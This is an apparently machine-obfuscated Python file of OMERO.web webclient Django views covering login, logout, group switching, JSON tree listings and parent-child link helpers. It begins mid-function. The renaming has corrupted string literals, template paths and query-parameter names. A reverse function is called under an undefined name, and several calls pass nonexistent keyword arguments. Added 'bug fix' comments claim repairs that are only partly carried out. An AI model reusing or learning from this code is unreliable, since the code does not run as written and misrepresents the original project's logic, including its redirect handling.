    if len(VAR_240) > 0:
        # Bug fix: list.sort() takes `key`/`reverse`, not the obfuscated
        # VAR_312/VAR_352 keyword names (TypeError at runtime).
        VAR_240.sort(key=lambda x: x.getId(), reverse=True)
        VAR_338 = VAR_240[0]  # newest link
        VAR_293 = VAR_338.creationEventDate()
        VAR_34 = VAR_338.getChild().getId()
        from omeroweb.webgateway.templatetags.common_filters import ago

        VAR_31 = VAR_352("download_annotation", args=[VAR_34])
        VAR_172 = {
            "created": VAR_347(VAR_293),
            "ago": ago(VAR_293),
            "id": VAR_34,
            "download": VAR_31,
        }
    return VAR_172  # will FUNC_81 returned as json by VAR_4
# ---- module imports (relocated section) ----
# Standard library
import copy
import datetime
import json
import logging
import os
import re
import sys
import traceback
import warnings
from time import time

# Compatibility / Ice
import Ice
from Ice import Exception as IceException
from future.utils import bytes_to_native_str
from past.builtins import unicode

# Django
from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import (
    Http404,
    HttpResponse,
    HttpResponseRedirect,
    JsonResponse,
    HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.shortcuts import render
from django.template import loader as template_loader
from django.utils.encoding import smart_str
from django.utils.html import escape
from django.utils.http import is_safe_url
from django.utils.http import urlencode
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST

# OMERO
import omero
import omero.scripts
from omero import ApiUsageException, ServerError, CmdError
from omero.gateway.utils import toBoolean
from omero.model import (
    AnnotationAnnotationLinkI,
    DatasetI,
    DatasetImageLinkI,
    ExperimenterI,
    ImageI,
    OriginalFileI,
    PlateI,
    ProjectI,
    ProjectDatasetLinkI,
    ScreenI,
    ScreenPlateLinkI,
    TagAnnotationI,
)
from omero.rtypes import wrap, unwrap, rlong, rlist

# OMERO.web
from omeroweb.decorators import (
    ConnCleaningHttpResponse,
    parse_url,
    TableClosingHttpResponse,
)
from omeroweb.feedback.views import handlerInternalError
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
    Show,
    IncorrectMenuError,
    paths_to_object,
    paths_to_tag,
)
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.webgateway.util import getIntOrDefault
from omeroweb.webgateway.views import LoginView

# Package-local
from . import tree
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
# Python 2/3 compatibility: VAR_241 is the widest integer constructor.
# Bug fix: `import .long` is invalid syntax; referencing the (py2-only)
# builtin raises NameError, not ImportError, on Python 3.
try:
    VAR_241 = long  # noqa: F821 - Python 2 builtin
except NameError:
    VAR_241 = int

# Module-level logger for all webclient views.
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())

# Hard cap for paged queries (multiple of the configured page size).
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
    """Return GET parameter *VAR_3* coerced via VAR_241 (long/int),
    falling back to *VAR_4*; None when neither supplies a value."""
    VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
    return None if VAR_52 is None else VAR_241(VAR_52)
def FUNC_1(VAR_2, VAR_3):
    """Return all non-empty values of the repeated GET parameter *VAR_3*."""
    return [VAR_416 for VAR_416 in VAR_2.GET.getlist(VAR_3) if VAR_416 != ""]
def FUNC_2(VAR_2, VAR_3):
    """Deprecated wrapper: delegate to omeroweb.webgateway.util.get_longs()."""
    warnings.warn(
        "Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
    )
    return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
    """Return GET parameter *VAR_3* as a boolean (via toBoolean),
    using *VAR_4* when the parameter is absent."""
    return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
def FUNC_4(VAR_5):
    """Validate a redirect target URL (open-redirect / CWE-601 guard).

    Any URL that fails Django's is_safe_url() check against the
    configured REDIRECT_ALLOWED_HOSTS is replaced with the webindex URL,
    so user-supplied ?url= parameters can never redirect off-site.
    """
    if not is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
        # NOTE(review): VAR_352 appears to be Django's reverse() — confirm.
        VAR_5 = VAR_352("webindex")
    return VAR_5
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
    """Render the (optionally customised) index page.

    Uses settings.INDEX_TEMPLATE when configured and loadable; otherwise
    falls back to the default template, reporting any load error.
    """
    VAR_53 = {"version": omero_version, "build_year": build_year}
    VAR_389 = settings.INDEX_TEMPLATE
    if VAR_389 is None:
        VAR_53["template"] = "webclient/VAR_93.html"
        return VAR_53
    try:
        template_loader.get_template(VAR_389)
    except Exception:
        VAR_53["template"] = "webclient/VAR_93.html"
        VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
    else:
        VAR_53["template"] = VAR_389
    return VAR_53
class CLASS_0(LoginView):
    """Webclient login page view: renders the form, redirects on success."""

    VAR_54 = "webclient/login.html"  # template name
    VAR_55 = "OMERO.web"  # client user-agent string

    def FUNC_81(self, VAR_2):
        # GET: simply show the login form.
        return self.handle_not_logged_in(VAR_2)

    def FUNC_82(self, VAR_2, VAR_6, VAR_56):
        """Successful login: drop stale session state and redirect."""
        if VAR_2.session.get("active_group"):
            if (
                VAR_2.session.get("active_group")
                not in VAR_6.getEventContext().memberOfGroups
            ):
                del VAR_2.session["active_group"]
        if VAR_2.session.get("user_id"):
            del VAR_2.session["user_id"]
        if VAR_2.session.get("server_settings"):
            del VAR_2.session["server_settings"]
        if VAR_2.POST.get("noredirect"):
            return HttpResponse("OK")
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is None or len(VAR_5) == 0:
            try:
                VAR_5 = parse_url(settings.LOGIN_REDIRECT)
            except Exception:
                VAR_5 = VAR_352("webindex")
        else:
            # Open-redirect protection for the user-supplied ?url=.
            VAR_5 = FUNC_4(VAR_5)
        return HttpResponseRedirect(VAR_5)

    def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
        """Render the login form, optionally with an error message."""
        if VAR_22 is None:
            VAR_339 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
            if VAR_339 is not None:
                VAR_115 = {"server": unicode(VAR_339)}
                # Bug fix: was LoginForm(VAR_115=initial) with the
                # undefined name `initial` (NameError).
                VAR_22 = LoginForm(VAR_115=VAR_115)
            else:
                VAR_22 = LoginForm()
        VAR_53 = {
            "version": omero_version,
            "build_year": build_year,
            "error": VAR_57,
            "form": VAR_22,
        }
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is not None and len(VAR_5) != 0:
            VAR_53["url"] = urlencode({"url": VAR_5})
        if hasattr(settings, "LOGIN_LOGO"):
            VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
        if settings.PUBLIC_ENABLED:
            VAR_340 = VAR_352("webindex")
            if settings.PUBLIC_URL_FILTER.search(VAR_340):
                VAR_53["public_enabled"] = True
                VAR_53["public_login_redirect"] = VAR_340
        VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
        if settings.SHOW_CLIENT_DOWNLOADS:
            # Bug fix: the regex literals were corrupted ("\VAR_364" for
            # "\d", "VAR_416" for "v"); restore digit classes and the
            # leading "v" of GitHub release tags.
            VAR_341 = re.match(
                (
                    r"(?P<major>\d+)\."
                    r"(?P<minor>\d+)\."
                    r"(?P<patch>\d+\.?)?"
                    r"(?P<dev>(dev|a|b|rc)\d+)?.*"
                ),
                omero_version,
            )
            VAR_342 = "^v%s\\.%s\\.[^-]+$" % (
                VAR_341.group("major"),
                VAR_341.group("minor"),
            )
            VAR_53["client_download_tag_re"] = VAR_342
            VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
        # Bug fix: `self.template` does not exist on this class; the
        # template attribute is VAR_54.
        return render(VAR_2, self.VAR_54, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
    """Keepalive ping: returns "OK" while the session connection is alive."""
    return HttpResponse("OK")
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
    """Change the session's active group, then redirect to a safe URL."""
    FUNC_8(VAR_2)
    # Avoid redirect loops back into this view; default to the index page.
    if VAR_5 is None or VAR_5.startswith(VAR_352("change_active_group")):
        VAR_5 = VAR_352("webindex")
    # FUNC_4 rejects off-site targets (open-redirect protection).
    VAR_5 = FUNC_4(VAR_5)
    return HttpResponseRedirect(VAR_5)
def FUNC_8(VAR_2, VAR_8=None):
    """Store group id *VAR_8* (or the "active_group" GET param) in the
    session as "active_group", marking the session modified on change."""
    if VAR_8 is None:
        VAR_8 = FUNC_0(VAR_2, "active_group", None)
        if VAR_8 is None:
            return
    VAR_8 = int(VAR_8)
    VAR_390 = (
        "active_group" in VAR_2.session
        and VAR_2.session["active_group"] == VAR_8
    )
    if not VAR_390:
        VAR_2.session.modified = True
        VAR_2.session["active_group"] = VAR_8
def FUNC_9(VAR_2, VAR_9="All members"):
    """Build a fake experimenter dict (id -1) representing "everyone".

    The display label comes from the server settings at
    ui.menu.dropdown.everyone.label, falling back to *VAR_9*.
    """
    VAR_390 = VAR_2.session.get("server_settings")
    for VAR_312 in ("ui", "menu", "dropdown", "everyone"):
        VAR_390 = VAR_390.get(VAR_312, {})
    VAR_58 = VAR_390.get("label", VAR_9)
    return {
        "id": -1,
        "omeName": VAR_58,
        "firstName": VAR_58,
        "lastName": "",
    }
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
    """Log out: close the OMERO connection and flush the Django session.

    POST performs the logout and redirects to the login view; GET renders
    a confirmation form instead.
    """
    if VAR_2.method == "POST":
        try:
            try:
                VAR_6.close()
            except Exception:
                # Best-effort close: log but still clear the session.
                VAR_0.error("Exception during FUNC_10.", exc_info=True)
        finally:
            VAR_2.session.flush()
        return HttpResponseRedirect(VAR_352(settings.LOGIN_VIEW))
    else:
        VAR_53 = {"url": VAR_352("weblogout"), "submit": "Do you want to log out?"}
        VAR_54 = "webgateway/base/includes/post_form.html"
        return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Build the template context for the main webclient pages.

    Resolves the "show" request (initially selected/opened objects),
    the active group and user, group membership and colleague lists for
    the VAR_10 menu ("userdata", "usertags", "search", ...).
    """
    VAR_2.session.modified = True
    VAR_54 = VAR_7.get("template", None)
    if VAR_54 is None:
        if VAR_10 == "userdata":
            VAR_54 = "webclient/VAR_158/containers.html"
        elif VAR_10 == "usertags":
            VAR_54 = "webclient/VAR_158/containers.html"
        else:
            # Bug fix: was "% (VAR_10, menu)" with the undefined name
            # `menu`; both placeholders take the menu name.
            VAR_54 = "webclient/%s/%s.html" % (VAR_10, VAR_10)
    VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
    try:
        VAR_242 = VAR_59.first_selected
    except IncorrectMenuError as e:
        return HttpResponseRedirect(e.uri)
    VAR_60 = VAR_59.initially_open_owner
    if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
        # A ?show= object could not be resolved: a public user may need
        # to log in as themselves to see it.
        if (
            settings.PUBLIC_ENABLED
            and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
        ):
            return HttpResponseRedirect("%s?VAR_5=%s" % (VAR_352("weblogin"), VAR_5))
    if VAR_242 is not None:
        VAR_20 = VAR_242.details.group.id.val
        if VAR_6.isValidGroup(VAR_20):
            FUNC_8(VAR_2, VAR_20)
        else:
            VAR_242 = None
    VAR_61 = {}
    VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
    if VAR_10 == "search":
        if VAR_62.is_valid():
            VAR_61["query"] = VAR_62.cleaned_data["search_query"]
    VAR_5 = VAR_7.get("load_template_url", None)
    if VAR_5 is None:
        VAR_5 = VAR_352(viewname="load_template", args=[VAR_10])
    VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
    VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
    VAR_65 = [u.id for u in VAR_63]
    VAR_65.extend([u.id for u in VAR_64])
    VAR_66 = VAR_2.GET.get("experimenter")
    if VAR_60 is not None:
        if VAR_2.session.get("user_id", None) != -1:
            VAR_66 = VAR_60
    try:
        VAR_66 = VAR_241(VAR_66)
    except Exception:
        VAR_66 = None
    if VAR_66 is not None:
        # Only allow users that are members of the active group (or -1).
        if (
            VAR_66
            not in (
                set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
            )
            and VAR_66 != -1
        ):
            VAR_66 = None
    if VAR_66 is None:
        VAR_66 = VAR_2.session.get("user_id", None)
    if VAR_66 is None or int(VAR_66) not in VAR_65:
        if VAR_66 != -1:  # All VAR_166 in VAR_101 is allowed
            VAR_66 = VAR_6.getEventContext().userId
    VAR_2.session["user_id"] = VAR_66
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # Bug fix (×2 below): list.sort() takes `key=`, not `VAR_312=`.
    VAR_67.sort(key=lambda x: x.getName().lower())
    VAR_68 = VAR_67
    VAR_69 = ContainerForm()
    VAR_70 = {}
    if VAR_10 == "search":
        # Collect unique colleagues across all groups for the search UI.
        for g in VAR_68:
            g.loadLeadersAndMembers()
            for VAR_383 in g.leaders + g.colleagues:
                VAR_70[VAR_383.id] = VAR_383
        VAR_70 = list(VAR_70.values())
        VAR_70.sort(key=lambda x: x.getLastName().lower())
    VAR_53 = {
        "menu": VAR_10,
        "init": VAR_61,
        "myGroups": VAR_67,
        "new_container_form": VAR_69,
        "global_search_form": VAR_62,
    }
    VAR_53["groups"] = VAR_68
    VAR_53["myColleagues"] = VAR_70
    VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
    VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
    VAR_53["initially_select"] = VAR_59.initially_select
    VAR_53["initially_open"] = VAR_59.initially_open
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["current_url"] = VAR_5
    VAR_53["page_size"] = settings.PAGE
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
    VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
    VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
    VAR_53["search_default_user"] = settings.SEARCH_DEFAULT_USER
    VAR_53["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
    return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Render a main webclient template (delegates to FUNC_11)."""
    # Bug fix: keyword values referenced the undefined names request/
    # menu/conn/url; pass this view's parameters through instead.
    return FUNC_11(VAR_2=VAR_2, VAR_10=VAR_10, VAR_6=VAR_6, VAR_5=VAR_5, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
    """Context for the group/user dropdown: groups plus their members.

    Admins see every group except the system user/guest groups; other
    users only see groups they are a member of.
    """
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # Bug fix (×2 below): list.sort() takes `key=`, not `VAR_312=`.
    VAR_67.sort(key=lambda x: x.getName().lower())
    if VAR_6.isAdmin():  # Admin can see all groups
        VAR_243 = [
            VAR_6.getAdminService().getSecurityRoles().userGroupId,
            VAR_6.getAdminService().getSecurityRoles().guestGroupId,
        ]
        VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
        VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
        VAR_68.sort(key=lambda x: x.getName().lower())
    else:
        VAR_68 = VAR_67
    for g in VAR_68:
        g.loadLeadersAndMembers()  # load leaders / members
    VAR_53 = {
        "template": "webclient/base/includes/FUNC_13.html",
        "current_url": VAR_5,
        "groups": VAR_68,
        "myGroups": VAR_67,
    }
    return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
    """JSON listing of groups, optionally filtered by member id."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # Bug fix: keyword values referenced the undefined names
        # conn/member_id/page/limit; pass the local variables.
        VAR_68 = tree.marshal_groups(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
    """JSON for one experimenter; negative ids mean the fake "everyone"."""
    try:
        VAR_11 = VAR_241(VAR_11)
    except ValueError:
        return HttpResponseBadRequest("Invalid VAR_343 id")
    try:
        if VAR_11 < 0:
            VAR_343 = FUNC_9(VAR_2)
        else:
            # Bug fix: keyword values referenced the undefined names
            # conn/experimenter_id; pass the local variables.
            VAR_343 = tree.marshal_experimenter(
                VAR_6=VAR_6, VAR_11=VAR_11
            )
            if VAR_343 is None:
                raise Http404("No Experimenter found with ID %s" % VAR_11)
        return JsonResponse({"experimenter": VAR_343})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
    """JSON tree roots: projects, datasets, screens, plates and orphans
    for one group/experimenter, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_11 = FUNC_0(VAR_2, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_71 = dict()
    try:
        # Bug fix (all marshal calls below): keyword values referenced
        # undefined names (group_id, experimenter_id, page, limit);
        # pass the local variables instead.
        VAR_71["projects"] = tree.marshal_projects(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["datasets"] = tree.marshal_datasets(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["screens"] = tree.marshal_screens(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["plates"] = tree.marshal_plates(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        # Orphan visibility is configurable via server settings.
        try:
            VAR_344 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            VAR_344 = {"enabled": True}
        if (
            VAR_6.isAdmin()
            or VAR_6.isLeader(VAR_337=VAR_2.session.get("active_group"))
            or VAR_11 == VAR_6.getUserId()
            or VAR_344.get("enabled", True)
        ):
            VAR_247 = tree.marshal_orphaned(
                VAR_6=VAR_6,
                VAR_20=VAR_20,
                VAR_11=VAR_11,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
            VAR_247["name"] = VAR_344.get("name", "Orphaned Images")
            VAR_71["orphaned"] = VAR_247
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
    """JSON listing of datasets, optionally under a given project."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_245 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # Bug fix: keyword values referenced the undefined names
        # project_id/group_id/page/limit; pass the local variables.
        VAR_107 = tree.marshal_datasets(
            VAR_6=VAR_6, VAR_245=VAR_245, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
    """JSON listing of images in a dataset, orphan set, or share."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_246 = FUNC_0(VAR_2, "id", None)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
    try:
        # Bug fix: keyword values referenced undefined names (orphaned,
        # experimenter_id, dataset_id, ...); pass the local variables.
        VAR_106 = tree.marshal_images(
            VAR_6=VAR_6,
            VAR_247=VAR_247,
            VAR_11=VAR_11,
            VAR_246=VAR_246,
            VAR_25=VAR_25,
            VAR_248=VAR_248,
            VAR_20=VAR_20,
            VAR_87=VAR_87,
            VAR_250=VAR_250,
            VAR_249=VAR_249,
            VAR_88=VAR_88,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
    """JSON listing of plates, optionally under a given screen."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_251 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # Bug fix: keyword values referenced the undefined names
        # screen_id/group_id/page/limit; pass the local variables.
        VAR_110 = tree.marshal_plates(
            VAR_6=VAR_6, VAR_251=VAR_251, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
    """JSON listing of plate acquisitions (runs) for a plate."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_252 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_252 is None:
        return HttpResponseBadRequest("id (VAR_421) must be specified")
    try:
        # Bug fix: keyword values referenced the undefined names
        # plate_id/page/limit; pass the local variables.
        VAR_253 = tree.marshal_plate_acquisitions(
            VAR_6=VAR_6, VAR_252=VAR_252, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
    """Find the link objects joining a parent to a set of children.

    Returns None for combinations that have no link table ("orphaned",
    experimenter->dataset/plate/tag); otherwise returns
    (link_class_name, links). Raises Http404 for unsupported type
    combinations, or when an explicit parent id matches no links.
    """
    if VAR_12 == "orphaned":
        return None
    VAR_72 = None
    if VAR_12 == "experimenter":
        # "Orphaned" children directly under an experimenter are not
        # linked via a link table.
        if VAR_14 in ["dataset", "plate", "tag"]:
            return None
    elif VAR_12 == "project":
        if VAR_14 == "dataset":
            VAR_72 = "ProjectDatasetLink"
    elif VAR_12 == "dataset":
        if VAR_14 == "image":
            VAR_72 = "DatasetImageLink"
    elif VAR_12 == "screen":
        if VAR_14 == "plate":
            VAR_72 = "ScreenPlateLink"
    elif VAR_12 == "tagset":
        if VAR_14 == "tag":
            VAR_72 = "AnnotationAnnotationLink"
    if not VAR_72:
        raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
    VAR_73 = omero.sys.ParametersI()
    VAR_73.addIds(VAR_15)
    VAR_74 = VAR_6.getQueryService()
    VAR_75 = (
        """
        from %s olink join fetch olink.child join fetch olink.parent
        where olink.child.id in (:VAR_187)
        """
        % VAR_72
    )
    # NOTE(review): addIds() typically registers the parameter as "ids";
    # confirm the ":VAR_187" placeholder above matches that name.
    if VAR_13:
        VAR_73.add("pid", rlong(VAR_13))
        VAR_75 += " and olink.parent.id = :pid"
    VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
    if VAR_13 is not None and len(VAR_76) == 0:
        raise Http404(
            "No VAR_346 found for %s-%s to %s-%s"
            % (VAR_12, VAR_13, VAR_14, VAR_15)
        )
    return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
    """Build an unsaved link object joining one parent to one child.

    Returns the string "orphan" for experimenter->dataset/plate (no link
    object is needed to orphan a child), a new *LinkI object for the
    supported parent/child combinations, or None otherwise. The objects
    are created unloaded (id-only proxies).
    """
    if VAR_12 == "experimenter":
        if VAR_14 == "dataset" or VAR_14 == "plate":
            return "orphan"
    if VAR_12 == "project":
        VAR_254 = ProjectI(VAR_241(VAR_13), False)
        if VAR_14 == "dataset":
            VAR_345 = DatasetI(VAR_241(VAR_16), False)
            VAR_346 = ProjectDatasetLinkI()
            VAR_346.setParent(VAR_254)
            VAR_346.setChild(VAR_345)
            return VAR_346
    elif VAR_12 == "dataset":
        VAR_345 = DatasetI(VAR_241(VAR_13), False)
        if VAR_14 == "image":
            VAR_142 = ImageI(VAR_241(VAR_16), False)
            VAR_346 = DatasetImageLinkI()
            VAR_346.setParent(VAR_345)
            VAR_346.setChild(VAR_142)
            return VAR_346
    elif VAR_12 == "screen":
        VAR_384 = ScreenI(VAR_241(VAR_13), False)
        if VAR_14 == "plate":
            VAR_421 = PlateI(VAR_241(VAR_16), False)
            VAR_346 = ScreenPlateLinkI()
            VAR_346.setParent(VAR_384)
            VAR_346.setChild(VAR_421)
            return VAR_346
    elif VAR_12 == "tagset":
        if VAR_14 == "tag":
            VAR_346 = AnnotationAnnotationLinkI()
            VAR_346.setParent(TagAnnotationI(VAR_241(VAR_13), False))
            VAR_346.setChild(TagAnnotationI(VAR_241(VAR_16), False))
            return VAR_346
    return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
    """Map each object id in VAR_15 to its owner's experimenter id.

    "tag" is looked up as the "Annotation" type.
    """
    if VAR_14 == "tag":
        VAR_14 = "Annotation"
    return {
        VAR_38.id: VAR_38.details.owner.id.val
        for VAR_38 in VAR_6.getObjects(VAR_14, VAR_15)
    }
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
    """Create (POST) or delete (DELETE) parent-child links.

    The request body is a nested JSON dict of
    {parent_type: {parent_id: {child_type: [child_ids]}}}.
    """
    if VAR_2.method not in ["POST", "DELETE"]:
        # NOTE(review): "VAR_315" is not a JsonResponse kwarg; presumably
        # this should be status=405 — confirm.
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_315=405
        )
    try:
